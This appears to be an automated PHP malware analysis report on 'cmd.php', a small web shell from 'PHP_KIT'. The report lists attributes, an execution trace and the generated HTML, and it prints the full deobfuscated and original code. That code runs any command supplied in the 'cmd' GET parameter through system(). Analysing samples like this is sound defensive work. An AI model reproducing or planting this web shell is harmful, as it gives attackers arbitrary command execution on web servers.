PHP Malware Analysis
cmd.php
md5: c38ae5ba61fd84f6bbbab98d89d8a346
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, HTML, Original)
Input
- _GET (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
//
// PHP_KIT
//
// cmd.php = Command Execution
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if ($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>
Execution traces
data/traces/c38ae5ba61fd84f6bbbab98d89d8a346_trace-1676239710.3151.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:08:56.212899]
1 0 1 0.000160 393512
1 3 0 0.000202 393416 {main} 1 /var/www/html/uploads/cmd.php 0 0
1 3 1 0.000218 393416
0.000244 314224
TRACE END [2023-02-12 20:08:56.213014]
Generated HTML code
<html><head></head><body>
<form method="GET" name="myform" action="">
<input type="text" name="cmd">
<input type="submit" value="Send">
</form>
<pre><!--?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?-->
</pre>
</body></html>Original PHP code
<?
//
// PHP_KIT
//
// cmd.php = Command Execution
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>